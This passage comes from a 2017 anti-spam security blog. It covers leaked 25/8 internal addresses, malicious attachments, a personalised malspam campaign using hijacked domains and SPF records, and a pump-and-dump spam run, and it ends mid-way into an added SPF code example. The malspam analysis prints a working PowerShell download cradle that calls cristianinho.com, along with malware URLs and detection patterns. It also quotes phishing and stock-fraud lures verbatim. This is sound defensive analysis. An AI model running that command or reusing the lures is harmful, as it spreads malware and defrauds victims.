
Monday, 3 April 2017

25.0.0.0/8 is not your private network

A recent phishing email originating from Office 365 caused some confusion.. it apparently originated from an address in the 25.0.0.0/8 range, which according to a WHOIS lookup belongs to the UK's Ministry of Defence.

% Abuse contact for '25.0.0.0 - 25.255.255.255' is 'hostmaster@mod.uk'

inetnum:        25.0.0.0 - 25.255.255.255
netname:        UK-MOD-19850128
country:        GB
org:            ORG-DMoD1-RIPE
admin-c:        MN1891-RIPE
tech-c:         MN1891-RIPE
status:         LEGACY
notify:         hostmaster@mod.uk
mnt-by:         UK-MOD-MNT
mnt-domains:    UK-MOD-MNT
mnt-routes:     UK-MOD-MNT
mnt-by:         RIPE-NCC-LEGACY-MNT
created:        2005-08-23T10:27:23Z
last-modified:  2016-04-14T09:56:26Z
source:         RIPE

organisation:   ORG-DMoD1-RIPE
org-name:       UK Ministry of Defence
org-type:       LIR
address:        Not Published
address:        Not Published
address:        Not Published
address:        UNITED KINGDOM
phone:          +44(0)3067700816
e-mail:         mathew.newton643@mod.gov.uk
admin-c:        MN1891-RIPE
abuse-c:        MH12763-RIPE
mnt-ref:        RIPE-NCC-HM-MNT
mnt-ref:        UK-MOD-MNT
mnt-by:         RIPE-NCC-HM-MNT
mnt-by:         UK-MOD-MNT
created:        2004-04-17T12:18:23Z
last-modified:  2016-10-06T11:09:40Z
source:         RIPE

person:         Mathew Newton
address:        ISS Design Directorate, Joint Forces Command
address:        UK Ministry of Defence
phone:          +44 (0)30 677 00816
e-mail:         mathew.newton643@mod.gov.uk
abuse-mailbox:  hostmaster@mod.uk
notify:         mathew.newton643@mod.gov.uk
nic-hdl:        MN1891-RIPE
created:        2005-03-18T10:42:04Z
last-modified:  2016-12-20T10:33:13Z
source:         RIPE
mnt-by:         UK-MOD-MNT

In this case the connection appeared to come from dm5pr17cu002.internal.outlook.com, which does indeed resolve to 25.173.128.134.. which would place it in the MoD's address range. Yes?

Well.. no, because the 25.0.0.0/8 range isn't routable on the public Internet. You can't send traffic to it from the Internet. But it isn't a "private" IP range either: it is allocated to the MoD. It does seem, though, that some companies are taking advantage of this and using 25.0.0.0/8 for internal networks (much as they would 10.0.0.0/8), which it isn't designed for.

Of course, you can point a DNS record at anything; that doesn't mean the address it resolves to is reachable. A look at all the hosts in 25.173.0.0/16 reveals these apparently active servers:

blserver.net
www.blserver.net
blog.blserver.net
imap.blserver.net
mwhpr13cu002.internal.outlook.com
dm5pr17cu002.internal.outlook.com

25-173-116-219.1334762f6da5400c9f4cbba603d6c121.plex.direct
25-173-129-6.114b489248be4a2489583682ee5d5f3c.plex.direct
sql.engormix.com
has-on.info

In the case of the outlook.com servers the DNS has been misconfigured. What should resolve only PRIVATELY to a 25/8 address is resolving PUBLICLY to an address in that range. Of course, the servers never respond. And note that this is just one /16, not the whole /8 (reverse DNS for the whole /8 is insane).

The upshot is that the MoD get a lot of abuse calls for bad things that people think originate from their network, but it isn't actually happening.

If you are going to use blocks like 25.0.0.0/8 for internal uses, I would suggest that you take great care not to expose the internal IPs to the outside world. I'm sure the poor people at the MoD would appreciate it.
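One way to avoid exactly this kind of misattribution is to classify each hop in a message's Received: headers before deciding whom to contact. The Python below is an added example, not code from the original post; the header block is constructed, with the internal.outlook.com hostname and 25.173.128.134 taken from the post and the other two addresses made up.

```python
import ipaddress
import re
from typing import List, Optional, Tuple

# Added example, not from the original post. Classifies the addresses in a message's
# Received: headers so that an abuse report is not aimed at the WHOIS holder of a block
# that is allocated but never announced on the public Internet.

# 25.0.0.0/8 is a RIPE legacy allocation to the UK MoD and is not routed: nothing on
# the Internet can reach it, so a hop in this block is an internal address that leaked
# into a hostname or header, not a place the message came from. Extend the list with
# any other blocks you treat the same way.
UNROUTED_ALLOCATED = [ipaddress.ip_network("25.0.0.0/8")]

# Matches the IP in "from host (1.2.3.4)" or "from host [1.2.3.4]" in a Received: line.
_IP_RE = re.compile(r"[(\[](\d{1,3}(?:\.\d{1,3}){3})[)\]]")


def classify(ip_text: str) -> str:
    """Return 'private', 'allocated-unrouted' or 'public' for one IPv4 address."""
    ip = ipaddress.ip_address(ip_text)
    if ip.is_private or ip.is_loopback or ip.is_link_local:
        return "private"            # RFC 1918 and friends: never attributable
    if any(ip in net for net in UNROUTED_ALLOCATED):
        # Note: ip.is_global is True here, because 25/8 is not in the IANA
        # special-purpose registry. The library cannot know the block is unrouted;
        # that knowledge has to be encoded explicitly, as above.
        return "allocated-unrouted"
    return "public"


def received_hops(headers: str) -> List[Tuple[str, str]]:
    """(ip, classification) for each Received: line, outermost (most recent) first.
    Folded continuation lines are joined back onto the header they belong to."""
    unfolded: List[str] = []
    for line in headers.splitlines():
        if line[:1] in (" ", "\t") and unfolded:
            unfolded[-1] += " " + line.strip()
        else:
            unfolded.append(line)
    hops = []
    for line in unfolded:
        if line.lower().startswith("received:"):
            m = _IP_RE.search(line)
            if m:
                hops.append((m.group(1), classify(m.group(1))))
    return hops


def attributable_source(headers: str) -> Optional[str]:
    """The only hop worth reporting: the outermost public address, i.e. the peer that
    actually connected to our gateway. Everything below it is unverifiable and, for
    unrouted or private addresses, points at nobody."""
    for ip, kind in received_hops(headers):
        if kind == "public":
            return ip
    return None


# Constructed sample headers. The hostname and 25.173.128.134 are the ones the post
# describes; 40.107.21.88 and 10.0.0.15 are made-up hops.
SAMPLE_HEADERS = """\
Received: from EUR01-VE1-obe.outbound.protection.outlook.com (40.107.21.88)
  by mx.example.net with ESMTPS; Mon, 3 Apr 2017 09:12:44 +0100
Received: from dm5pr17cu002.internal.outlook.com (25.173.128.134) by
  DM5PR17MB1234.namprd17.prod.outlook.com with Microsoft SMTP Server
Received: from [10.0.0.15] (10.0.0.15) by smtp.example.org with ESMTP
Subject: Invoice attached
"""

if __name__ == "__main__":
    for ip, kind in received_hops(SAMPLE_HEADERS):
        print(f"{ip:<16} {kind}")
    print("report:", attributable_source(SAMPLE_HEADERS))
```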

Friday, 31 March 2017

Leaked documents reveal post-Brexit switch to pre-decimal currency

So with the UK leaving the EU thing kicking off into full swing a lot of interesting stories have been lost in the noise. As expected not only have hard Brexiteers managed to sneak in proposals that we ditch the metric system, it now also seems that they want to ditch decimal currency too.

Madness? Well, they seem to believe that things were better in the old days. Like the 18th Century perhaps. Anyway, these top secret double encoded plans (presumably leaked by Pro-Bremoaner criminals) have come to light outlining the steps of this particularly mad scheme. It already has a name in government - Dexit.

Basically, immediately after the UK leaves the EU the currency will change back to pounds, shillings and pence...you remember how that works, yes? 12 pence to a shilling, 20 shillings to a pound making 240 pence per pound... on a date pencilled in as being the first day of April in 2019.

All transactions will have to change at that point. However, the pound will still remain the pound including the new pound coin. Notes will still remain the same, although all new ones will contain animal fat by law. As with decimalisation, some coins will remain the same too - the 50p coin will remain valid as 10 shillings, 20p will be 4 shillings and so on for the 10p and 5p coins. New coins will be minted with the new denominations on, but they will circulate alongside the old ones. Copper coins are more of a problem and they will all be withdrawn and replaced.

The halfpenny will not return (thank goodness) and nor will the farthing (1/960th of a pound!). One might argue that the penny could be eliminated altogether as it isn't worth much these days, but apparently there is determination that it will come back.

All eCommerce sites operating in the UK and software will have to be updated to the new currency. It's not as simple as just changing the currency sign, and the law will state that all new computer software will have to support the new currency natively without mucking about with formulas. Formulae. Whatever.

One sticking point is the name of the coins. Technically the current currency is called "new pence", replacing the pre-decimal "old pence". Suggestions for the new coinage include "new old pence", "indedenpence" (clever!) and "Mike Pence".

There will be some exceptions:
  • In anticipation of Scottish independence, the new currency there will be called the "Groat".
  • In Gibraltar the currency will revert to the Euro when it is handed over to Spain (even though 99% of the population don't want that because democracy is so 2016)
  • In Northern Ireland the currency will be determined by whichever side wins the brutal 20-year civil war that follows Brexit.
All of this is quite a low price to pay for taking back control though, isn't it?

(Yes, this was an April Fool's joke, but not too far from what some Brexiters have actually suggested)

Thursday, 30 March 2017

Malware spam: "Re:Payment Remittance Copy"

This fake financial spam leads to malware.


From:    AL HUDA LTD [ap.office@triumftools.sk]
Date:    30 March 2017 at 09:05
Subject:    Re:Payment Remittance Copy
Signed by:    triumftools.sk

Dear Sir,

As instructed by your customer for your payment,

Find attached formal remittance copy received from our bank and contact your  client for payment confirmation. All payment details is in the attached HSBC TT-Copy.

Please Confirm
Best regards,
================================
Alan Bostock
Manager - Finance and Administration
HSBC Exchanger
TEL: (965) 24338094 -620                                  
FAX: (965) 24332815 Mobile: (965) 600-11-868
==================================


Attached is a .GZ archive HSBC TT-Copy.pdf.gz (this assumes you have a program on your Windows PC that can handle .gz files). This contains a malicious executable doc9876543234500001.exe which currently has a VirusTotal detection rate of 32/60.

Analysis of the binary is pending. You can be certain that it is nothing good.

Monday, 20 March 2017

More highly personalised malspam using hijacked domains

Following on from this spam some weeks ago, another one comes in using a broadly similar technique of including the potential victim's real home address while using apparently hijacked infrastructure (although in this case the hijacking isn't so elaborate).

From: customerservice@newshocks.com [mailto:customerservice@newshocks.com]
Sent: 15 March 2017 18:23
Subject: [Redacted] Your order 003009 details




Hello [redacted],
We are delighted to confirm details of your recent order 003009. We will email you again as soon as the items you have chosen are on their way to you.
If you have an online account with us, you can log in here to see the current status of your order.
You will receive another e-mail from us when we have despatched your order.
Information on order 003009 status here
All prices include VAT at the current rate. A full VAT receipt will be included with your order.
Delivery Address:

[Name and address redacted]

If you have any questions, or something about your order isn't right, please contact us. Or you can simply reply to this e-mail.
Best regards and many thanks,

Contact Us Opening Times Delivery Options Returns Policy Privacy Policy Terms & Conditions


The newshocks.com domain used in the "From" field matches the sending server of rel209.newshocks.com (also mail.newshocks.com) on 185.141.164.209. This appears to be a legitimate but unused domain belonging to a distributor of car parts.

The link in the email goes to clipartwin.com/customers/customer-status-003009-verified which is currently 404ing so I can't tell what the payload is, although the previous payload appears to be Ramnit or similar. This is using another hijacked but apparently legitimate web server.

I don't know where the data has leaked from, but in this case the victim had lived at the address for the past four years.. so the leak cannot be ancient. If you have seen something similar or have an idea of where the data came from, please leave a comment below.


Pump and dump spam: Incapta Inc (INCT)

It's been a long time since I've seen a pump-and-dump spam run illegally pushing a stock as hard as this:

From:
To:
Date:    20 March 2017 at 09:30
Subject:    This stock is about to receive a buy out at 10 times its current market price...

Dear Subscriber,

It's been a long time since I sent you my special newsletter containing a hot stock tip.
The reason for that is because I really haven't had many opportunities to present to you.

Incapta Inc (ticker: INCT) is a company that was brought to my attention earlier this morning
by one of my colleagues at an M&A firm in manhattan.

It seems that a buy out from DJI is imminent at $1.37 per share and is set to be announced
next week on Tuesday, March 28.

INCT is a company that has revolutionized the drone industry by creating the first independent drones
that can be dispatched to areas of interest such as crime scenes, car chases, wild fires, etc.

The network of drones operates by connecting to a cloud and complex algorithms efficiently dispatch the drones
within moments of an incident being reported.

This way the media outlet that owns the drones can be the first to the scene and get exclusive, live-streamed.

This has the potential to literally change the world of news broadcasting as we know it and DJI
(the most prominent drone-maker in the world) sees the potential of this technology which is why
they are willing to pay $1.37 a share to acquire it. A premium of over 1,000% over Friday's closing price.

Tell all your friends about INCT and make sure you buy it as soon as possible today at any price under
20 cents a share to guarantee yourself massive profits.
This company has millions of dollars worth of expenditure and almost zero income [source].


Towards the end of 2015, the stock was valued at $31,350 a share (!) but is now worth about 13 cents [source].

The spam is being sent from a botnet to random addresses. I have no evidence to suggest that Incapta Inc is behind this, but this commentary at InvestorsHub is not flattering.

Pump and dump spam like this is a criminal activity, and typically companies being promoted in this way are in terminal decline (but not always). Avoid buying stocks on the recommendation of criminals.

[UPDATE] This company has some form, previously it was known as GameZnFlix and then TBC Global News Network.

UPDATE 1

A second version of the spam is going around..

From:
To:
Date:    20 March 2017 at 17:11
Subject:    You can make 10x on your money by next week if you buy this stock now.

Dear Subscriber,

Do you remember the last time I sent you a tip about a company worth buying in the market?

I was right on point as its shares shot up more than tenfold in under 7 days.
I had privileged information and I knew that something big was brewing.

It took me months to find the next stock that is somewhat similar to that last one I told you about,
but you can be certain that the upside potential is just as good.

Incapta Incorporated [symbol: INCT] is a company that is on the verge of being acquired by a large drone-maker competitor.

On March 28th (yes, next week) there is going to be something special announced that will take the share price from under 0.20 to over a dollar, overnight.

INCT specializes in the manufacturing of high-end specialized drones with real-world applications such as automated dispatching for news coverage by companies like CNN all the way to miniature drones which can be used to gather intelligence for the military, private investigators and police.

This cutting edge technology is changing the world as we know it, and INCT is at the forefront of it all which is why it’s being acquired and its share price is about to go ballistic.

Tell everyone you know to buy INCT right now and keep it on the low as much as possible.

UPDATE 2

Third version..

From:
To:
Date:    21 March 2017 at 07:17
Subject:    Find out now why this company is going up tenfold by this time next week.

Dear profit seeker,

It’s been quite some time since I sent you information about a stock worth buying, but the last time I did the shares soared more than 15x.

This means that if you had put in just a grand you would have gotten 15k out of it when all is said and done.

Even if you only get 2 or 3 tips from me per year, all of them are guaranteed winners because I base my recommendations on knowing privileged information.

I don’t want you to miss out again so keep on reading to find out which company is going up 1,000% by this time next Tuesday.

Incapta Inc [tickersymbol: INCT] is about to be entirely acquired by an enormous multibillion dollar corporation.

On the 28 of March you can expect to see a public announcement made which will outline the details of this acquisition with the most important detail being the price at somewhere around $1.40

This means if you buy and hold INCT right now you’ll have a guaranteed profit of a thousand percent.

INCT is a company which has built “cloud droning”. That’s basically the ability for drones to have their own mind as they connect to a network of artificial intelligence and work with each other autonomously.

It is for example possible to set up a feature to dispatch them whenever there is a car accident somewhere in order to be the first on the scene. There are also endless military applications for these drones as the company has been in talks with the US Army for months already.

Please keep this information to yourself, don’t tell your friends or family to buy the stock now. This is exclusive to my subscribers only.

Cheers.

UPDATE 3

Another variant. Incidentally, this appears to originate from the Necurs Botnet which has also pushed Locky and Dridex in the past.

From:
To:
Date:    21 March 2017 at 14:06
Subject:    Here is your chance to buy shares that will go up 10x by next week.

To all my subscribers,

As you obviously know, I have been quiet these last couple of months because I really have not had a stock worth recommending for purchase.

After the last stock’s 1,500% gains I really want to make sure that whatever I tell you to buy next will be a big winner since your expectations are high.

Today I want you to keep an eye on INCT (incapta inc) because something really huge is about to happen next week.

One of the gents I work with back in New York told me that INCT is on the verge of signing a deal to sell the company to a large multinational and this deal should be announced on Tuesday or Wednesday of next week and will carry a price per share of $1.38

I guess their special drone technology is too good to ignore, and a massive player wants to acquire all their know-how, IP and manufacturing capabilities.

That being said, this is a very rare opportunity to get in before the deal is officially announced and make a quick 10x on your principal in just 7 days.

Keep this on the low but do act quickly if you want to buy in. I recommend an entry point of 17 cents or under to maximize the upside.

All the best.

UPDATE 4

Another variant. The last time I looked, this spam run had persuaded people to buy more than six million shares in this company, which in my personal opinion appear to be worthless. There are only around 100 million shares, so this seems like a fair chunk.

From:
To:
Date:    22 March 2017 at 08:08
Subject:    This public company is being bought out. Read now to profit from it.

Dear valued member,

It has been a very long time since I emailed you about a rare investment opportunity.

You signed up to my newsletter because you were seeking to only invest in companies which I can guarantee will go up and I only email you when I know one will.

The last stock I told you to buy went up about 1000% and this next one is guaranteed a solid 1300% keep on reading to find out why.

INCT (incapta inc) is a drone-maker with proprietary algorithms which essentially bring drones to life. These algorithms give the drones the capability to act independent of a physical operator.

Because of they own this amazing technology which they developed in house, they have been receiving huge attention from the US Army as well as several private firms including DJI and Amazon.

A guy I work with at a mergers and acquisition firm in New York told me that INCT is about to be bought out for $1.37 per share on Tuesday or Wednesday of next week. He has always come through for me.

While INCT may currently seem stagnant, that’s because very few people know about this imminent deal so don't let that fool you.

I don't expect the stock price to swing much in either direction until the takeover is announced next week, at which point it will shoot up to around $1.37 overnight.

You know what to do if you want to profit when this happens.

Keep it on the hush, but do act quickly.

Best Regards,
Viola Haney

UPDATE 5

Another variant. So far over 12 million shares have been traded although the stock price has slumped 47% since yesterday. This is over 10% of the company that has been traded, bringing in around $140,000 for whoever holds them (and in my opinion the shares are worth nothing at all).

From:   
To:
Date:    22 March 2017 at 16:00
Subject:    Read Now: Why this company’s shares are guaranteed to soar next week.

Howdy,

We haven't communicated in a while and you might be wondering why I'm emailing you now out of the blue but it's because I have something very special to share with you.

Remember this last company I told you to buy a few months ago? It jumped around 1000% in like two weeks if you recall.

I've got another one of those to share with you today and you could make some serious profits with it if you buy it now.

INCT (incapta inc) is a high technology company that's got some very special and unique drone systems. In fact, their stuff in so interesting that even the United States government has taken notice of it.
Anyway I won't bore you with the details, so the reason why I am telling you about INCT is because a buy out is imminent.
A gentleman I've known for almost a decade now who works out of an m&a company in manhattan told me that on March 28 INCT will be bought out by a large corporation at a price of $1.38 a share.

The stock is down today (these things happen), but it's absolutely meaningless and shouldn't scare you in any way, shape or form because once the buy out is announced, this stock is going to shoot up to 1.38 in a matter of minutes which is essentially guaranteed gains of about 1400% from current prices.

The stock is down because some investors are selling. It must be that they haven't heard the news, and they will be feeling very stupid next week when the announcement is made public.

Keep this on the low and feel free to buy as many shares as you possibly can right now.

Take care,
Vivian Rogers

UPDATE 6

12.7 million shares have now been traded, out of 100 million shares in total. Who actually holds this much stock in Incapta, Inc? According to SEC filings.. one person. Amusingly, the spammers forgot to mention the actual stock they were pushing..

From:
To:
Date:    23 March 2017 at 08:07
Subject:    I've got strong reasons to believe that this stock is about to soar.

Alright, let's get right to it...

We've been out of touch for a while. I've been very busy looking for the next big stock that has the potential to explode and it took me months to find one.

If I can be honest, this one came to me as a god send. I got lucky. I have this friend who works at a law firm in NYC and we've known each other for a very long time.

Long story short, he told me that his firm is about to finalize a big takeover by a multibillion corporation. They're buying this tiny company that is now trading at just around 10 cents a share.

I couldn't believe my ears when I heard him say that they're paying somewhere between $1.30 and $1.39 for the company. The deal is closing and being announced mid next week.

I could get into what the company does, but who really cares right? All we need to know is that they are in the high tech industry and that this is going to be a huge buyout.

I recommend you buy shares as soon as possible today and wait it out until you get paid over $1.30 next week. The way takeovers work is that they will just credit this price per share, in cash, to your brokerage account and in exchange will take the shares that you bought at just pennies.

I may never have another tip like this, so cash in on it while you still can.

UPDATE 7

Another version pushing this (in my personal opinion) worthless stock. So far about 15 million of the apparently 100 million shares in this company have been traded, bringing SOMEBODY in more than $1.5m in cash. The profit they are getting depends on how much they paid of course.

From:
To:
Date:    24 March 2017 at 06:53
Subject:    Allow me to share something profitable with you today.

If you're wondering why I'm emailing you now, out of the blue, after months of radio silence let me tell you that I have a good reason for that.

Do you remember the last time I sent you a tip? It was around November if I recall correctly.

If you bought that stock I told you about back then, you would've quadrupled your money at the very least.

Now here we are, a few months later and I've got something else to tell you about.

Basically if you remember, I've got a good acquaintance who works at a law firm in New York and when I took him out to a fancy steak dinner last Monday (with lots of wine) he became very talkative and let me in on a little tip.

This is what I want to share with you today. He essentially told me that some time mid next week, a small company called incapta (ticker: INCT) is going to announce that it's being acquired by a giant for a little over 1.30 a share (yes over a dollar thirty, and yes it's at just under 15 cents now)

He knows this because his law firm is the one that drafted all the paperwork for the deal and they are expected to finalize and sign the agreements today, with the official announcement coming some time between Tuesday and Thursday.

If you buy shares today, you are guaranteed to make approximately tenfold next week. The way it works is if you're holding the shares they will just take them out of your account automatically and credit you with the cash equivalent to 1.37 or so which you can take out whenever you want and spend on nice things.

Keep me in mind when you're rolling in it. I expect a big thank you and maybe a small gift!

UPDATE 8

InCapta's CEO, John Fleming, issued a statement denying that the firm had anything to do with this "newsletter" (actually a massive, illegal spam run):

SAN DIEGO, CA / ACCESSWIRE / March 23, 2017 / InCapta, Inc. (OTC PINK: INCT) announced today that it has been made aware of and requested by the OTC Markets Group, Inc. to comment on recent trading and promotional activity concerning INCT common stock.

On March 22, 2017, OTC Markets informed the Company that it became aware of certain promotional activities concerning InCapta and its common stock. OTC Markets informed the company that it had received copies of promotional newsletter emails encouraging investors to purchase the Company's common stock. The Company has been informed that this promotional activity coincided with higher than average trading volume in the Company's stock. The Company was unaware of the promotional activity until informed by OTC Markets and is unaware of the full nature and content of this promotional activity, the responsible parties, and the extent of the email newsletters' dissemination.

InCapta states definitively that the Company, its officers, directors and, to the Company's knowledge, its controlling shareholders (i.e., shareholders owning 10% or more of the Company's securities) have not, directly or indirectly, authorized or been involved in any way (including payment to a third-party) with the creation or distribution of promotional materials including these email newsletters; and that the Company, its officers, directors and, to the knowledge of the Company, any controlling shareholders, have not sold or purchased the Company's securities within the past 30 days other than as specified below.

"The Company is not aware of the promotional materials' author or its affiliated entities or persons. The Company's recent press releases have reported on and provided disclosure of legitimate and ongoing corporate activity only, and are not part of any promotional activities or campaign," stated John Fleming, CEO of InCapta. The Company encourages those interested in the Company to rely solely on information included in its press releases combined with its filings and disclosures made with OTCMarkets Group. The Caveat Emptor warning is mandated for 30 days, wherein a review by OTCMarkets shall take place to decide on its removal. The Company is determined to take appropriate measures in this time to satisfy, without delay, any and all concerns which brought on the label. We thank OTCMarkets for their openness and consideration to the investors of InCapta.

About InCapta, Inc.
InCapta, Inc., formerly known as TBC Global News Network, Inc., is a media holding company, which works with clients to develop, operate, and market online cloud Television networks and other entertainment projects. The Company participates in various fields of online business models by providing executive level managerial assistance as well as arranging for clients online presence through social media.

[Legalese snipped for readability]

CONTACT
John Fleming
InCapta, Inc.
Tel: (619) 798-9284
hxxp://www.incapta.com
SOURCE: InCapta, Inc.





Wednesday, 15 February 2017

Malware spam: "RBC - Secure Message" / service@rbc-secure-message.com

This fake banking email leads to some sort of malware:



From:    RBC - Royal Bank [service@rbc-secure-message.com]
Date:    15 February 2017 at 17:50
Subject:    RBC - Secure Message
Signed by:    rbc-secure-message.com


Secure Message Secure Icon
This is an automated message send by Royal Bank Secure Messaging Server. To ensure both you and the RBC Royal Bank comply with current legislation, this message has been encrypted. Please check attached documents for more information.

Note: You should not store confidential information unless it is encrypted.
CONFIDENTIALITY NOTICE:The contents of this email message and any attachments are intended solely for the addressee(s)and may contain confidential and/or privileged information and may be legally protected from disclosure. If you are not the recipient of this message or their agent, or if this message has been addressed to you in error, please immediately alert the sender by reply email and then delete this message and any attachments. If you are not the recipient, you are hereby notified that any use, dissemination, copying, or storage of this message or its attachments is strictly prohibited.


RBCSecureMessage.doc
44K



Attached is a file RBCSecureMessage.doc which contains some sort of macro-based malware. It displays the following page to entice victims to disable their security settings.



Automated analysis is inconclusive [1] [2]. The domain rbc-secure-message.com is fake and has been registered solely for the purpose of malware distribution. In all the samples I saw, the sending IP was 64.91.248.146 (Liquidweb, US) but it does look like all these IPs in the neighbourhood are involved in the same activity:

64.91.248.137
64.91.248.146
64.91.248.148
64.91.248.150

I recommend you block 64.91.248.128/27 at your email gateway to be sure.





Highly personalised malspam making extensive use of hijacked domains

This spam email contained not only the intended victim's name, but also their home address and an apparently valid mobile telephone number:

Sent: 14 February 2017 13:52
To: [redacted]
From: <customer@localpoolrepair.com>
Subject: Mr [Redacted] Your order G29804772-064 confirmation


Dear Mr [redacted],

Thank you for placing an order with us.

For your reference your order number is G29804772-064.

Please note this is an automated email. Please do not reply to this email.

Get your order G29804772-064 details

Your order has been placed and items in stock will be sent to the address shown below. Please check all the details of the order to ensure they are correct as we will be unable to make changes once the order has been processed. You will have been notified at the point of order if an item is out of stock already with expected delivery date.

Delivery Address
[address redacted]
[telephone number redacted]

Delivery Method:
Standard Delivery


Your Order Information
Prices include VAT at 20%


Customer Service Feedback
We are always working to improve the products and service we provide to our customers - we do this through a continual review of the product range, and ongoing training of our Customer Service Team. We continually strive to improve our levels of service and we welcome feedback from our customers regarding your buying experience and the product you receive.

Feefo Independent Reviews
21 days after your purchase, you will receive an email from the independent feedback company Feefo. It takes less than a minute to complete and we'd really appreciate your feedback!


IMPORTANT INFORMATION ABOUT YOUR ORDER

Delivery

Order Tracking
Once your order has left our warehouse we will email you to confirm that the items have been shipped and include tracking details of the parcel so that you may track delivery progress directly with our courier company.

Stock Availability
On very rare occasions not every item will be available when we come to pack and despatch your order. If this is the case you will receive an email from us letting you know which items are affected and an expected delivery time.

Product Returns
All items purchased are covered by our customer friendly returns policy. Please visit for full details.
Thank you for placing your order with us. We really appreciate your custom and will do everything within our power to ensure you get the very best of service.

The data in the spam was identifiable as being a few years old. The intended victim does not appear on the haveibeenpwned.com database. My assumption is that this information has been harvested from an undisclosed data breach.

I was not able to extract the final payload, however the infection path is as follows:

http://bebracelet.com/customerarea/notification-processing-G29804772-064.doc
--> http://customer.abudusolicitors.com/customerarea/notification-processing-G29804772-064.doc
--> https://customer.affiliate-labs.net/customerarea/notification-processing-G29804772-064.zip

This ZIP file actually contains a .lnk file with the following PowerShell command embedded in it:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -nop -ep bypass -nologo -c IEX ((New-Object Net.WebClient).DownloadString('http://cristianinho.com/lenty/reasy.ps1'));
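The command line above has the shape of a classic download cradle, and it is the shape rather than the specific domain that is worth alerting on. The Python below is an added example, not from the original post; it scores a command line on those markers and pulls out the URL for a web blocklist. The two benign samples are constructed for contrast.

```python
import re
from typing import Dict, List, Optional

# Added example, not from the original post. Scores a command line for the markers of
# a PowerShell download cradle like the one embedded in the .lnk above, and extracts
# the URL so it can go on a web blocklist. Flag abbreviations are PowerShell's own
# (-w = -WindowStyle, -nop = -NoProfile, -ep = -ExecutionPolicy, -c = -Command).

# (name, regex, weight): each marker found adds its weight to the score.
MARKERS = [
    ("hidden_window",   r"-w(?:indowstyle)?\s+hidden", 2),
    ("no_profile",      r"-nop(?:rofile)?\b", 1),
    ("policy_bypass",   r"-e(?:xecutionpolicy|p)\s+bypass", 2),
    ("iex",             r"\b(?:iex|invoke-expression)\b", 2),
    ("download_string", r"\.downloadstring\(", 2),
    ("webclient",       r"net\.webclient", 1),
]
_URL_RE = re.compile(r"https?://[^\s'\")]+", re.IGNORECASE)


def analyse(cmdline: str) -> Dict[str, object]:
    """Return the markers hit, the total score, the first URL found, and a verdict."""
    hits: List[str] = []
    score = 0
    for name, pattern, weight in MARKERS:
        if re.search(pattern, cmdline, re.IGNORECASE):
            hits.append(name)
            score += weight
    m = _URL_RE.search(cmdline)
    url: Optional[str] = m.group(0) if m else None
    # A cradle needs both "run something fetched remotely" (IEX plus a fetch) and
    # "stay quiet"; -ep bypass on its own is common in legitimate admin scripts.
    cradle = ("iex" in hits
              and ("download_string" in hits or "webclient" in hits)
              and score >= 6)
    return {"hits": hits, "score": score, "url": url, "cradle": cradle}


# Constructed samples: the first is the command quoted in the post above, the other
# two are benign-looking admin invocations for contrast.
SAMPLES = [
    r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -w hidden -nop -ep bypass "
    r"-nologo -c IEX ((New-Object Net.WebClient).DownloadString('http://cristianinho.com/lenty/reasy.ps1'));",
    r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1",
    r"powershell.exe -NoProfile -Command Get-Service -Name Spooler",
]

if __name__ == "__main__":
    for s in SAMPLES:
        r = analyse(s)
        print(r["cradle"], r["score"], r["hits"], r["url"])
```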

I couldn't get a response from the server at cristianinho.com [5.152.199.228 - Redstation, UK]; this looks like a possibly legitimate but hijacked domain that uses nameservers belonging to Namecheap. But that's not the only Namecheap connection, because the two "customer" subdomains are also using Namecheap hosting (for the record the subdomains are hosted on 185.130.207.37 and 185.141.165.204, which are Host1Plus, UK / Digital Energy Technologies, DE).

A triple connection to Namecheap is worrying, and we have certainly seen hijacking patterns involving other domain registrars. Or it could just be a coincidence..

The email originated from mx119.argozelo.info on 188.214.88.119 (Hzone, Romania). Just on a hunch, I checked the domain argozelo.info and it appears to be a wholly legitimate site about a Portuguese village, registered at GoDaddy hosted on Blogger. So why does it need a dedicated mail server?

Well.. this particular rabbit hole goes a little deeper. mx119 gives a clue that there might be more than one mailserver, and indeed there are 34 of the critters, named mx110.argozelo.info through to mx143.argozelo.info and hosted on 188.214.88.110 through 188.214.88.142. But according to Wikipedia, Argozelo only has about 700 inhabitants, so it seems unlikely that they'd need 34 mailservers in Romania.

So, my guess is that argozelo.info has also been hijacked, and hostnames set up for each of the mailservers. But we're not quite finished with this rabbit hole yet. Oh no.

What caught my eye was a mailserver on 188.214.88.110 (the same as mx110.argozelo.info) named mail.localpoolrepair.com which certainly rang a bell because the email was apparently from customer@localpoolrepair.com - yeah, OK.. the "From" in an email can be anything but this can't be a coincidence.

localpoolrepair.com appears to be a legitimate but unused GoDaddy-registered domain, hosted at an Athenix facility in the US. So why is there a mailserver in a Romanian IP block? A DIG at the records for this domain is revealing:

 Query for localpoolrepair.com type=255 class=1
  localpoolrepair.com SOA (Zone of Authority)
        Primary NS: dns.site5.com
        Responsible person: hostmaster@site5.com
        serial:2017021207
        refresh:3600s (60 minutes)
        retry:3600s (60 minutes)
        expire:604800s (7 days)
        minimum-ttl:3600s (60 minutes)
  localpoolrepair.com A (Address) 143.95.232.95
  localpoolrepair.com MX (Mail Exchanger) Priority: 10 mail.localpoolrepair.com
  localpoolrepair.com NS (Nameserver) dns2.site5.com
  localpoolrepair.com NS (Nameserver) dns.site5.com
  localpoolrepair.com TXT (Text Field)
    v=spf1 ip4:188.214.88.110/31 ip4:188.214.88.112/28 ip4:188.214.88.128/29 ip4:188.214.88.136/30 ip4:188.214.88.140/31 ip4:188.214.88.142/32  ~all

So.. the SPF record authorises sending servers in the 188.214.88.110 through 188.214.88.142 range. It looks to me as if localpoolrepair.com has been hijacked and these SPF records added to it.

So we have hijacked legitimate domains with presumably a neutral or good reputation, and we have valid SPF records. This means that the spam will have decent deliverability. And then the spam itself addresses the victim by name and has personal details presumably stolen in a data breach. Could you trust yourself not to click the link?
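To see what that record actually grants, here is an added example (not from the original post) that evaluates the SPF record above offline: it handles only the ip4 and all mechanisms, so include:, a and mx terms, which need DNS, are rejected rather than guessed at. The sending addresses checked are the ones quoted in the post.

```python
import ipaddress
from typing import List, Optional, Tuple

# Added example, not from the original post. A minimal SPF evaluator for the record
# quoted above, covering only the "ip4" and "all" mechanisms (no DNS lookups), to show
# what the hijacked localpoolrepair.com record actually authorises.

# The TXT record as shown in the DIG output in the post.
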